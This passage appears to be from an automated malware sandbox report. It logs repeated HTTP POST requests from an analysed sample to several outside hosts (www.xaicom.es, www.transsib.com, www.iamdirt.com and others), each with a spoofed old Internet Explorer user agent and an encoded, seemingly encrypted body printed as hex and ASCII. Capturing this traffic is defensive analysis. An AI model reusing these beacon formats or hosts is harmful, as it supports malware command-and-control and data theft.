73 66 6e 42 55 73 49 6f 2f 6c 37 71 4b 4e 2f 78 6e 58 5a 76 55 73 58 59 32 57 56 30 36 63 4d 2b 52 63 4b 75 37 32 61 63 44 77 67 34 50 4a 4e 4f 79 65 65 65 69 2b 74 4b 51 35 59 52 6a 76 2b 2b 49 59 67 6e 54 45 7a 70 50 62 70 70 6c 43 44 43 74 4d 52 43 2f 44 59 34 6e 67 68 58 44 52 5a 34 36 6d 67 47 6e 4e 50 4c 36 42 31 64 42 5a 73 66 73 65 6f 6e 66 2b 41 7a 35 55 42 4c 6c 50 2f 31 44 2b 6c 6e 61 53 71 32 37 6c 2f 75 6c 74 71 41 6f 45 5a 78 4e 47 4f 73 78 73 52 4e 70 62 51 4f 4f 77 63 32 76 64 4e 2b 42 4d 36 76 48 65 6e 5a 34 4a 65 45 51 6c 67 77 4e 68 75 46 57 6c 48 4e 66 74 6b 4d 72 56 79 4f 57 39 38 63 50 4e 4e 6e 34 6d 6c 34 38 71 4e 4c 51 54 59 53 39 69 70 47 45 53 30 72 4c 52 38 4c 41 34 75 52 49 52 55 72 79 6c 33 79 2b 50 35 6c 66 37 66 59 64 36 32 52 71 61 63 37 56 76 78 30 43 44 56 66 55 43 54 33 42 6c 6d 43 68 61 55 4c 68 51 53 30 6f 67 3d Data Ascii: mow8HxDl5gjJ2XNho/X8DcMij604gbJGRCUC41HIScMPRcnzJgwLkrRP0AdwK5InfrhOoTKHEZuGg0FLIo3oN7vU19ug+yatgQrI69kaQlKYAuj4pQDtu416ygmS5JXtCg9zQKqNInfnMmLsexe3VllvHhYmXNViXrk7bTcrZGws8cPm0ecU83vwcFREEBwuqUfh7M5ThQydxDC8VaKBsqszTqWvx2FINtB2s/v33+FjEMs/EaTbf7ezvI8NdrUmGfC2fsfnBUsIo/l7qKN/xnXZvUsXY2WV06cM+RcKu72acDwg4PJNOyeeei+tKQ5YRjv++IYgnTEzpPbpplCDCtMRC/DY4nghXDRZ46mgGnNPL6B1dBZsfseonf+Az5UBLlP/1D+lnaSq27l/ultqAoEZxNGOsxsRNpbQOOwc2vdN+BM6vHenZ4JeEQlgwNhuFWlHNftkMrVyOW98cPNNn4ml48qNLQTYS9ipGES0rLR8LA4uRIRUryl3y+P5lf7fYd62Rqac7Vvx0CDVfUCT3BlmChaULhQS0og=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 6d 6f 77 38 48 78 44 6c 35 67 6a 4a 32 58 4e 68 6f 2f 58 38 44 63 4d 69 6a 36 30 34 67 62 4a 47 52 43 55 43 34 31 48 49 53 63 4d 50 52 63 6e 7a 4a 67 77 4c 6b 72 52 50 30 41 64 77 4b 35 49 6e 66 72 68 4f 6f 54 4b 48 45 5a 75 47 67 30 46 4c 49 6f 33 6f 4e 37 76 55 31 39 75 67 2b 79 61 74 67 51 72 49 36 39 6b 61 51 6c 4b 59 41 75 6a 34 70 51 44 74 75 34 31 36 79 67 6d 53 35 4a 58 74 43 67 39 7a 51 4b 71 4e 49 6e 66 6e 4d 6d 4c 73 65 78 65 33 56 6c 6c 76 48 68 59 6d 58 4e 56 69 58 72 6b 37 62 54 63 72 5a 47 77 73 38 63 50 6d 30 65 63 55 38 33 76 77 63 46 52 45 45 42 77 75 71 55 66 68 37 4d 35 54 68 51 79 64 78 44 43 38 56 61 4b 42 73 71 73 7a 54 71 57 76 78 32 46 49 4e 74 42 32 73 2f 76 33 33 2b 46 6a 45 4d 73 2f 45 61 54 62 66 37 65 7a 76 49 38 4e 64 72 55 6d 47 66 43 32 66 73 66 6e 42 55 73 49 6f 2f 6c 37 71 4b 4e 2f 78 6e 58 5a 76 55 73 58 59 32 57 56 30 36 63 4d 2b 52 63 4b 75 37 32 61 63 44 77 67 34 50 4a 4e 4f 79 65 65 65 69 2b 74 4b 51 35 59 52 6a 76 2b 2b 49 59 67 6e 54 45 7a 70 50 62 70 70 6c 43 44 43 74 4d 52 43 2f 44 59 34 6e 67 68 58 44 52 5a 34 36 6d 67 47 6e 4e 50 4c 36 42 31 64 42 5a 73 66 73 65 6f 6e 66 2b 41 7a 35 55 42 4c 6c 50 2f 31 44 2b 6c 6e 61 53 71 32 37 6c 2f 75 6c 74 71 41 6f 45 5a 78 4e 47 4f 73 78 73 52 4e 70 62 51 4f 4f 77 63 32 76 64 4e 2b 42 4d 36 76 48 65 6e 5a 34 4a 65 45 51 6c 67 77 4e 68 75 46 57 6c 48 4e 66 74 6b 4d 72 56 79 4f 57 39 38 63 50 4e 4e 6e 34 6d 6c 34 38 71 4e 4c 51 54 59 53 39 69 70 47 45 53 30 72 4c 52 38 4c 41 34 75 52 49 52 55 72 79 6c 33 79 2b 50 35 6c 66 37 66 59 64 36 32 52 71 61 63 37 56 76 78 30 43 44 56 66 55 43 54 33 42 6c 6d 43 68 61 55 4c 68 51 53 30 6f 67 3d Data Ascii: mow8HxDl5gjJ2XNho/X8DcMij604gbJGRCUC41HIScMPRcnzJgwLkrRP0AdwK5InfrhOoTKHEZuGg0FLIo3oN7vU19ug+yatgQrI69kaQlKYAuj4pQDtu416ygmS5JXtCg9zQKqNInfnMmLsexe3VllvHhYmXNViXrk7bTcrZGws8cPm0ecU83vwcFREEBwuqUfh7M5ThQydxDC8VaKBsqszTqWvx2FINtB2s/v33+FjEMs/EaTbf7ezvI8NdrUmGfC2fsfnBUsIo/l7qKN/xnXZvUsXY2WV06cM+RcKu72acDwg4PJNOyeeei+tKQ5YRjv++IYgnTEzpPbpplCDCtMRC/DY4nghXDRZ46mgGnNPL6B1dBZsfseonf+Az5UBLlP/1D+lnaSq27l/ultqAoEZxNGOsxsRNpbQOOwc2vdN+BM6vHenZ4JeEQlgwNhuFWlHNftkMrVyOW98cPNNn4ml48qNLQTYS9ipGES0rLR8LA4uRIRUryl3y+P5lf7fYd62Rqac7Vvx0CDVfUCT3BlmChaULhQS0og=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 70 39 74 35 65 6f 6b 63 43 77 6e 36 44 4d 76 57 32 50 79 2b 36 4b 49 35 33 38 71 6e 68 48 4a 4f 7a 62 2f 46 48 6e 74 39 55 79 72 6f 52 6e 54 77 6c 52 6f 2f 32 4a 4e 33 77 51 79 57 67 79 53 66 62 77 55 55 63 4d 76 58 5a 57 66 49 4c 69 70 45 49 33 6d 7a 38 6c 6f 7a 55 6d 57 4b 4c 61 46 62 4c 78 45 79 6b 79 59 68 77 46 48 4d 64 59 58 56 50 2f 6e 6c 52 46 55 58 72 2f 4b 43 4b 2f 36 77 71 78 54 39 62 53 52 49 6f 35 4f 39 49 6e 68 50 61 66 69 4d 53 47 7a 30 77 41 6b 56 51 72 50 68 4d 7a 4b 32 6a 68 54 56 4f 6d 43 45 69 6f 66 68 34 59 6e 4b 35 31 77 4a 66 54 69 66 48 47 37 31 31 46 44 56 58 34 30 51 4c 67 67 35 78 76 4e 78 56 58 77 64 61 4c 56 6f 6e 68 42 54 48 72 75 32 77 79 6d 5a 54 72 51 47 44 56 36 52 38 6d 6b 52 75 4b 72 31 65 76 69 43 70 4a 47 51 34 4f 71 69 76 71 37 44 35 30 62 70 79 70 79 75 4a 4b 4a 6e 35 76 39 72 69 37 72 79 79 63 32 68 6e 45 54 33 35 50 53 66 44 4d 41 57 4e 49 75 34 78 36 53 4e 49 36 71 36 58 37 74 45 52 6f 45 6e 72 4a 74 42 4e 74 2f 6a 7a 72 6b 61 51 42 71 4b 46 78 6e 56 6d 72 6d 67 71 71 53 73 74 45 7a 72 56 41 44 41 30 69 73 6a 76 4b 66 48 2f 48 4b 6f 33 79 42 77 57 6b 49 67 69 45 68 6e 67 42 43 44 6c 33 41 4d 79 67 53 41 44 46 64 47 44 73 42 68 79 6a 73 58 63 69 61 46 79 42 76 4b 41 6f 42 6c 52 30 2f 2f 6c 69 62 35 62 5a 31 6b 31 57 36 31 65 34 4a 67 41 39 49 77 64 4d 71 35 31 52 62 76 79 6e 2f 64 7a 44 30 52 31 47 57 61 57 30 64 6e 4c 68 62 4f 42 6a 57 58 6b 69 2f 33 57 77 4d 6b 4b 4d 2b 6e 39 70 61 4f 70 42 6f 6f 64 63 58 43 68 4e 6b 70 58 59 46 5a 58 6d 75 48 50 42 51 54 58 58 49 77 69 50 43 47 32 79 44 75 39 33 2f 4b 4a 30 37 69 4f 6e 55 48 32 42 54 2b 74 44 33 77 71 5a 78 6a 6e 73 52 75 57 55 55 4f 69 67 56 71 6a 49 68 38 55 61 75 35 41 48 50 67 4d 51 77 66 73 76 49 74 6e 65 6e 46 4d 31 68 35 56 64 52 67 72 54 73 4d Data Ascii: p9t5eokcCwn6DMvW2Py+6KI538qnhHJOzb/FHnt9UyroRnTwlRo/2JN3wQyWgySfbwUUcMvXZWfILipEI3mz8lozUmWKLaFbLxEykyYhwFHMdYXVP/nlRFUXr/KCK/6wqxT9bSRIo5O9InhPafiMSGz0wAkVQrPhMzK2jhTVOmCEiofh4YnK51wJfTifHG711FDVX40QLgg5xvNxVXwdaLVonhBTHru2wymZTrQGDV6R8mkRuKr1eviCpJGQ4Oqivq7D50bpypyuJKJn5v9ri7ryyc2hnET35PSfDMAWNIu4x6SNI6q6X7tERoEnrJtBNt/jzrkaQBqKFxnVmrmgqqSstEzrVADA0isjvKfH/HKo3yBwWkIgiEhngBCDl3AMygSADFdGDsBhyjsXciaFyBvKAoBlR0//lib5bZ1k1W61e4JgA9IwdMq51Rbvyn/dzD0R1GWaW0dnLhbOBjWXki/3WwMkKM+n9paOpBoodcXChNkpXYFZXmuHPBQTXXIwiPCG2yDu93/KJ07iOnUH2BT+tD3wqZxjnsRuWUUOigVqjIh8Uau5AHPgMQwfsvItnenFM1h5VdRgrTsM
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 50 5a 4f 59 76 53 70 70 32 77 69 57 46 75 58 4b 44 51 61 55 59 4f 32 76 49 38 46 61 75 4a 59 2b 2f 6d 33 2b 32 58 70 34 55 2b 54 65 32 4b 59 73 33 69 67 5a 55 44 79 39 79 54 57 47 79 4f 47 44 51 47 57 2f 66 73 67 58 37 33 53 38 4b 38 55 4d 4a 33 32 35 4a 64 64 32 76 31 71 45 42 63 74 39 56 77 6e 78 47 72 4e 5a 32 67 56 6a 4b 41 79 38 4b 6f 61 54 4b 77 53 54 57 31 36 4f 66 4e 73 55 79 43 78 58 4c 57 32 78 49 59 43 56 57 57 59 54 71 51 55 50 36 7a 43 4c 79 76 46 69 2f 4f 2b 50 6a 53 36 6f 44 49 72 43 69 48 4d 6f 6b 65 2f 78 45 75 5a 44 77 6a 54 73 50 67 38 63 79 45 74 37 31 74 77 57 65 4f 77 4a 58 65 73 4c 58 44 4e 69 48 77 6b 30 65 2f 4c 69 36 52 52 49 75 76 76 4d 58 38 67 4b 48 59 67 51 4e 4e 39 63 58 4d 44 69 39 62 42 55 74 38 4c 6f 4e 4c 58 2f 2b 54 74 5a 77 78 64 34 76 58 57 69 46 46 67 49 2f 68 64 61 6c 70 68 36 2b 31 46 5a 63 44 57 59 37 6a 32 30 45 6c 37 48 37 76 38 7a 61 75 33 52 31 37 55 30 72 68 62 33 67 4a 71 59 67 4b 42 72 4f 77 31 74 58 37 71 51 64 67 6c 2b 31 59 44 4c 38 4b 63 6c 61 58 48 73 4a 70 73 38 62 51 47 6a 2b 34 78 70 6d 59 6b 32 31 32 4f 2b 37 59 7a 57 6e 31 4e 57 6d 51 76 65 33 33 4d 31 70 41 77 7a 48 6d 67 68 69 58 6f 4e 44 64 30 4d 79 79 2b 57 55 4c 4d 4e 4b 62 4a 66 52 52 51 50 6d 70 67 51 4b 49 55 37 6b 6d 61 43 39 32 4f 44 2f 33 78 38 59 51 72 52 6d 6b 42 62 6d 4a 6c 41 6d 64 41 48 43 30 43 46 4b 5a 35 6e 58 4c 63 73 70 5a 4a 74 67 63 70 57 4b 44 70 73 59 66 4c 64 4c 6c 53 45 42 2b 41 39 46 6c 53 6b 43 39 74 56 77 4c 61 67 48 6a 67 7a 73 6e 79 65 4b 31 4f 53 6e 47 38 64 32 4a 4d 49 36 51 43 47 59 5a 6b 78 63 48 77 73 32 59 51 78 56 59 74 32 46 47 4f 41 63 4d 50 66 67 46 48 69 35 73 31 58 42 7a 6a 59 6f 68 32 39 74 6f 46 77 46 31 52 39 42 62 4d 64 31 6b 79 46 4d 6a 6e 31 33 49 45 6b 72 37 45 70 37 41 3d 3d Data Ascii: PZOYvSpp2wiWFuXKDQaUYO2vI8FauJY+/m3+2Xp4U+Te2KYs3igZUDy9yTWGyOGDQGW/fsgX73S8K8UMJ325Jdd2v1qEBct9VwnxGrNZ2gVjKAy8KoaTKwSTW16OfNsUyCxXLW2xIYCVWWYTqQUP6zCLyvFi/O+PjS6oDIrCiHMoke/xEuZDwjTsPg8cyEt71twWeOwJXesLXDNiHwk0e/Li6RRIuvvMX8gKHYgQNN9cXMDi9bBUt8LoNLX/+TtZwxd4vXWiFFgI/hdalph6+1FZcDWY7j20El7H7v8zau3R17U0rhb3gJqYgKBrOw1tX7qQdgl+1YDL8KclaXHsJps8bQGj+4xpmYk212O+7YzWn1NWmQve33M1pAwzHmghiXoNDd0Myy+WULMNKbJfRRQPmpgQKIU7kmaC92OD/3x8YQrRmkBbmJlAmdAHC0CFKZ5nXLcspZJtgcpWKDpsYfLdLlSEB+A9FlSkC9tVwLagHjgzsnyeK1OSnG8d2JMI6QCGYZkxcHws2YQxVYt2FGOAcMPfgFHi5s1XBzjYoh29toFwF1R9BbMd1kyFMjn13IEkr7Ep7A==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 70 39 74 35 65 6f 6b 63 43 77 6e 36 44 4d 76 57 32 50 79 2b 36 4b 49 35 33 38 71 6e 68 48 4a 4f 7a 62 2f 46 48 6e 74 39 55 79 72 6f 52 6e 54 77 6c 52 6f 2f 32 4a 4e 33 77 51 79 57 67 79 53 66 62 77 55 55 63 4d 76 58 5a 57 66 49 4c 69 70 45 49 33 6d 7a 38 6c 6f 7a 55 6d 57 4b 4c 61 46 62 4c 78 45 79 6b 79 59 68 77 46 48 4d 64 59 58 56 50 2f 6e 6c 52 46 55 58 72 2f 4b 43 4b 2f 36 77 71 78 54 39 62 53 52 49 6f 35 4f 39 49 6e 68 50 61 66 69 4d 53 47 7a 30 77 41 6b 56 51 72 50 68 4d 7a 4b 32 6a 68 54 56 4f 6d 43 45 69 6f 66 68 34 59 6e 4b 35 31 77 4a 66 54 69 66 48 47 37 31 31 46 44 56 58 34 30 51 4c 67 67 35 78 76 4e 78 56 58 77 64 61 4c 56 6f 6e 68 42 54 48 72 75 32 77 79 6d 5a 54 72 51 47 44 56 36 52 38 6d 6b 52 75 4b 72 31 65 76 69 43 70 4a 47 51 34 4f 71 69 76 71 37 44 35 30 62 70 79 70 79 75 4a 4b 4a 6e 35 76 39 72 69 37 72 79 79 63 32 68 6e 45 54 33 35 50 53 66 44 4d 41 57 4e 49 75 34 78 36 53 4e 49 36 71 36 58 37 74 45 52 6f 45 6e 72 4a 74 42 4e 74 2f 6a 7a 72 6b 61 51 42 71 4b 46 78 6e 56 6d 72 6d 67 71 71 53 73 74 45 7a 72 56 41 44 41 30 69 73 6a 76 4b 66 48 2f 48 4b 6f 33 79 42 77 57 6b 49 67 69 45 68 6e 67 42 43 44 6c 33 41 4d 79 67 53 41 44 46 64 47 44 73 42 68 79 6a 73 58 63 69 61 46 79 42 76 4b 41 6f 42 6c 52 30 2f 2f 6c 69 62 35 62 5a 31 6b 31 57 36 31 65 34 4a 67 41 39 49 77 64 4d 71 35 31 52 62 76 79 6e 2f 64 7a 44 30 52 31 47 57 61 57 30 64 6e 4c 68 62 4f 42 6a 57 58 6b 69 2f 33 57 77 4d 6b 4b 4d 2b 6e 39 70 61 4f 70 42 6f 6f 64 63 58 43 68 4e 6b 70 58 59 46 5a 58 6d 75 48 50 42 51 54 58 58 49 77 69 50 43 47 32 79 44 75 39 33 2f 4b 4a 30 37 69 4f 6e 55 48 32 42 54 2b 74 44 33 77 71 5a 78 6a 6e 73 52 75 57 55 55 4f 69 67 56 71 6a 49 68 38 55 61 75 35 41 48 50 67 4d 51 77 66 73 76 49 74 6e 65 6e 46 4d 31 68 35 56 64 52 67 72 54 73 4d Data Ascii: p9t5eokcCwn6DMvW2Py+6KI538qnhHJOzb/FHnt9UyroRnTwlRo/2JN3wQyWgySfbwUUcMvXZWfILipEI3mz8lozUmWKLaFbLxEykyYhwFHMdYXVP/nlRFUXr/KCK/6wqxT9bSRIo5O9InhPafiMSGz0wAkVQrPhMzK2jhTVOmCEiofh4YnK51wJfTifHG711FDVX40QLgg5xvNxVXwdaLVonhBTHru2wymZTrQGDV6R8mkRuKr1eviCpJGQ4Oqivq7D50bpypyuJKJn5v9ri7ryyc2hnET35PSfDMAWNIu4x6SNI6q6X7tERoEnrJtBNt/jzrkaQBqKFxnVmrmgqqSstEzrVADA0isjvKfH/HKo3yBwWkIgiEhngBCDl3AMygSADFdGDsBhyjsXciaFyBvKAoBlR0//lib5bZ1k1W61e4JgA9IwdMq51Rbvyn/dzD0R1GWaW0dnLhbOBjWXki/3WwMkKM+n9paOpBoodcXChNkpXYFZXmuHPBQTXXIwiPCG2yDu93/KJ07iOnUH2BT+tD3wqZxjnsRuWUUOigVqjIh8Uau5AHPgMQwfsvItnenFM1h5VdRgrTsM
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 31 78 78 75 38 2f 51 4e 6c 41 6d 53 74 31 61 53 54 2b 42 57 45 30 63 4e 63 63 6a 73 39 52 6a 30 61 4d 4c 41 33 4c 70 55 47 6c 51 55 62 66 61 43 6d 41 6e 66 74 78 72 32 4a 75 54 61 46 67 46 6a 34 56 7a 53 46 4e 67 2f 44 64 59 61 30 45 33 6d 5a 4d 48 34 44 65 2b 62 4c 4d 73 34 4e 36 2f 65 65 6d 33 61 6e 70 70 4e 61 42 4e 35 46 6c 69 6a 59 46 35 35 52 4c 65 4c 30 62 42 6b 6d 68 35 73 6f 4b 41 6b 6a 54 47 74 31 36 51 39 69 73 48 42 46 78 63 55 42 53 59 79 55 75 7a 71 4c 6c 4b 76 35 49 6a 74 2f 50 30 79 33 37 64 6d 6f 35 56 36 4e 75 4c 47 4c 31 33 77 48 69 66 30 73 69 78 48 32 54 34 64 76 2b 58 30 41 7a 4e 46 70 34 46 51 38 44 66 72 34 68 65 4d 4d 39 30 4e 36 49 4a 5a 39 2b 76 67 78 61 52 79 47 75 54 32 4b 6e 47 63 2b 6f 69 7a 38 57 5a 71 6b 47 75 65 6e 49 70 71 72 4d 66 7a 4b 5a 51 2b 75 39 78 74 53 46 4d 59 78 62 76 48 62 6f 67 52 45 62 64 59 39 57 70 39 77 64 6a 78 51 65 58 45 50 34 39 57 65 30 4a 74 64 4d 37 37 76 39 34 74 6f 6d 64 58 78 59 6a 37 57 7a 4d 6a 33 31 58 4d 46 51 76 30 55 7a 4b 32 52 49 4f 32 6b 49 4f 46 71 63 68 67 62 57 37 37 6a 4b 6c 45 6d 37 42 53 73 6c 46 39 67 44 55 65 68 61 6d 74 59 68 53 53 61 34 57 4d 6a 69 52 59 54 43 79 70 7a 30 77 62 2f 32 77 7a 2b 32 4f 55 63 30 71 47 33 30 79 42 62 77 48 76 55 38 62 45 58 63 4b 68 58 4b 4e 58 43 57 4e 41 61 79 6b 36 6b 4d 68 4a 7a 52 2f 64 5a 74 58 76 5a 6f 53 59 54 49 62 78 51 76 44 43 69 6f 52 51 52 55 57 31 41 56 33 2f 58 4a 49 7a 41 61 75 39 4f 69 75 39 45 4b 4f 6e 4e 6d 73 6d 69 33 75 74 79 5a 41 58 77 77 74 77 6e 69 45 33 57 2f 42 35 67 6c 65 47 73 6e 72 71 64 79 7a 4b 44 6c 39 33 67 56 69 74 42 43 77 79 37 66 44 51 53 79 4e 38 53 49 4a 50 6c 53 5a 38 52 65 52 35 48 70 68 66 50 30 77 4c 39 47 50 47 52 32 34 5a 48 5a 47 64 4c 59 58 4e 42 54 78 68 41 70 64 49 42 50 62 57 4d 59 6f 3d Data Ascii: 1xxu8/QNlAmSt1aST+BWE0cNccjs9Rj0aMLA3LpUGlQUbfaCmAnftxr2JuTaFgFj4VzSFNg/DdYa0E3mZMH4De+bLMs4N6/eem3anppNaBN5FlijYF55RLeL0bBkmh5soKAkjTGt16Q9isHBFxcUBSYyUuzqLlKv5Ijt/P0y37dmo5V6NuLGL13wHif0sixH2T4dv+X0AzNFp4FQ8Dfr4heMM90N6IJZ9+vgxaRyGuT2KnGc+oiz8WZqkGuenIpqrMfzKZQ+u9xtSFMYxbvHbogREbdY9Wp9wdjxQeXEP49We0JtdM77v94tomdXxYj7WzMj31XMFQv0UzK2RIO2kIOFqchgbW77jKlEm7BSslF9gDUehamtYhSSa4WMjiRYTCypz0wb/2wz+2OUc0qG30yBbwHvU8bEXcKhXKNXCWNAayk6kMhJzR/dZtXvZoSYTIbxQvDCioRQRUW1AV3/XJIzAau9Oiu9EKOnNmsmi3utyZAXwwtwniE3W/B5gleGsnrqdyzKDl93gVitBCwy7fDQSyN8SIJPlSZ8ReR5HphfP0wL9GPGR24ZHZGdLYXNBTxhApdIBPbWMYo=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 50 5a 4f 59 76 53 70 70 32 77 69 57 46 75 58 4b 44 51 61 55 59 4f 32 76 49 38 46 61 75 4a 59 2b 2f 6d 33 2b 32 58 70 34 55 2b 54 65 32 4b 59 73 33 69 67 5a 55 44 79 39 79 54 57 47 79 4f 47 44 51 47 57 2f 66 73 67 58 37 33 53 38 4b 38 55 4d 4a 33 32 35 4a 64 64 32 76 31 71 45 42 63 74 39 56 77 6e 78 47 72 4e 5a 32 67 56 6a 4b 41 79 38 4b 6f 61 54 4b 77 53 54 57 31 36 4f 66 4e 73 55 79 43 78 58 4c 57 32 78 49 59 43 56 57 57 59 54 71 51 55 50 36 7a 43 4c 79 76 46 69 2f 4f 2b 50 6a 53 36 6f 44 49 72 43 69 48 4d 6f 6b 65 2f 78 45 75 5a 44 77 6a 54 73 50 67 38 63 79 45 74 37 31 74 77 57 65 4f 77 4a 58 65 73 4c 58 44 4e 69 48 77 6b 30 65 2f 4c 69 36 52 52 49 75 76 76 4d 58 38 67 4b 48 59 67 51 4e 4e 39 63 58 4d 44 69 39 62 42 55 74 38 4c 6f 4e 4c 58 2f 2b 54 74 5a 77 78 64 34 76 58 57 69 46 46 67 49 2f 68 64 61 6c 70 68 36 2b 31 46 5a 63 44 57 59 37 6a 32 30 45 6c 37 48 37 76 38 7a 61 75 33 52 31 37 55 30 72 68 62 33 67 4a 71 59 67 4b 42 72 4f 77 31 74 58 37 71 51 64 67 6c 2b 31 59 44 4c 38 4b 63 6c 61 58 48 73 4a 70 73 38 62 51 47 6a 2b 34 78 70 6d 59 6b 32 31 32 4f 2b 37 59 7a 57 6e 31 4e 57 6d 51 76 65 33 33 4d 31 70 41 77 7a 48 6d 67 68 69 58 6f 4e 44 64 30 4d 79 79 2b 57 55 4c 4d 4e 4b 62 4a 66 52 52 51 50 6d 70 67 51 4b 49 55 37 6b 6d 61 43 39 32 4f 44 2f 33 78 38 59 51 72 52 6d 6b 42 62 6d 4a 6c 41 6d 64 41 48 43 30 43 46 4b 5a 35 6e 58 4c 63 73 70 5a 4a 74 67 63 70 57 4b 44 70 73 59 66 4c 64 4c 6c 53 45 42 2b 41 39 46 6c 53 6b 43 39 74 56 77 4c 61 67 48 6a 67 7a 73 6e 79 65 4b 31 4f 53 6e 47 38 64 32 4a 4d 49 36 51 43 47 59 5a 6b 78 63 48 77 73 32 59 51 78 56 59 74 32 46 47 4f 41 63 4d 50 66 67 46 48 69 35 73 31 58 42 7a 6a 59 6f 68 32 39 74 6f 46 77 46 31 52 39 42 62 4d 64 31 6b 79 46 4d 6a 6e 31 33 49 45 6b 72 37 45 70 37 41 3d 3d Data Ascii: PZOYvSpp2wiWFuXKDQaUYO2vI8FauJY+/m3+2Xp4U+Te2KYs3igZUDy9yTWGyOGDQGW/fsgX73S8K8UMJ325Jdd2v1qEBct9VwnxGrNZ2gVjKAy8KoaTKwSTW16OfNsUyCxXLW2xIYCVWWYTqQUP6zCLyvFi/O+PjS6oDIrCiHMoke/xEuZDwjTsPg8cyEt71twWeOwJXesLXDNiHwk0e/Li6RRIuvvMX8gKHYgQNN9cXMDi9bBUt8LoNLX/+TtZwxd4vXWiFFgI/hdalph6+1FZcDWY7j20El7H7v8zau3R17U0rhb3gJqYgKBrOw1tX7qQdgl+1YDL8KclaXHsJps8bQGj+4xpmYk212O+7YzWn1NWmQve33M1pAwzHmghiXoNDd0Myy+WULMNKbJfRRQPmpgQKIU7kmaC92OD/3x8YQrRmkBbmJlAmdAHC0CFKZ5nXLcspZJtgcpWKDpsYfLdLlSEB+A9FlSkC9tVwLagHjgzsnyeK1OSnG8d2JMI6QCGYZkxcHws2YQxVYt2FGOAcMPfgFHi5s1XBzjYoh29toFwF1R9BbMd1kyFMjn13IEkr7Ep7A==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 76 43 67 68 74 55 67 58 65 51 6e 79 7a 64 43 56 69 39 4c 6a 50 4c 74 6c 58 70 7a 51 4f 37 6a 72 2f 4e 36 5a 31 65 31 4c 64 48 61 6b 6d 68 4d 54 70 37 72 68 66 48 46 35 62 57 66 6e 51 31 35 33 4c 46 61 63 44 4d 36 49 37 7a 6c 57 6e 32 61 34 44 33 6a 4e 77 46 7a 71 4f 78 74 68 76 41 49 51 31 2f 5a 2f 54 42 36 66 4e 77 7a 42 6f 55 77 68 70 7a 61 78 32 4d 50 37 4e 41 45 73 35 71 53 4e 61 66 32 49 32 4a 52 62 33 65 4a 44 49 73 74 50 66 46 69 2f 76 4d 38 30 38 39 4c 53 6c 2b 2f 38 7a 31 4b 30 51 77 78 6b 79 77 46 58 33 73 69 4d 36 6e 4a 30 52 78 58 41 66 2f 74 4a 46 42 65 67 33 37 71 45 33 73 73 56 68 4a 70 68 78 4e 4e 2f 59 48 6d 31 6c 2f 77 63 59 69 4e 49 47 53 53 72 65 36 6a 58 57 50 4f 75 7a 49 33 6c 70 71 42 34 7a 48 6f 64 55 36 61 55 74 42 63 62 77 65 50 46 58 72 6c 7a 77 4e 7a 79 58 45 54 31 2f 63 35 72 4f 7a 6c 71 6f 2f 54 56 56 53 6d 2b 38 74 77 63 50 4c 36 4f 38 70 45 5a 7a 44 58 62 6d 77 39 4f 2f 47 58 2f 37 50 54 52 52 4d 4f 63 32 55 52 4f 47 70 69 6e 56 45 39 7a 62 45 48 6b 6b 6d 64 4a 38 4f 61 30 76 44 2f 67 49 75 42 6b 70 30 38 78 50 35 51 62 73 55 6a 48 4a 38 38 52 45 45 41 79 2f 44 36 79 2b 62 43 50 62 41 61 38 52 32 79 58 79 33 63 46 33 61 68 72 36 70 67 6d 33 36 63 5a 5a 43 5a 34 74 33 42 6c 74 4b 6f 75 5a 77 48 4c 68 4d 6c 47 65 57 6e 46 5a 79 66 39 56 4f 30 53 37 34 2f 36 7a 39 70 33 79 4c 41 59 6a 79 6e 4c 66 61 4c 53 59 4b 5a 6b 47 65 4e 6e 33 48 4e 37 50 48 47 64 4e 58 70 57 33 46 5a 72 6c 47 43 52 78 6d 77 54 70 33 47 4d 5a 76 43 2b 48 76 4a 46 36 34 30 6f 62 52 54 2b 35 66 6d 43 56 69 79 45 4f 64 51 4f 4f 75 43 6b 4a 32 49 4a 4a 48 33 68 59 52 42 72 6e 6f 73 62 77 65 42 46 68 56 32 49 63 65 6c 34 61 47 4d 47 50 51 44 44 32 39 42 68 33 59 74 76 42 6a 55 3d Data Ascii: 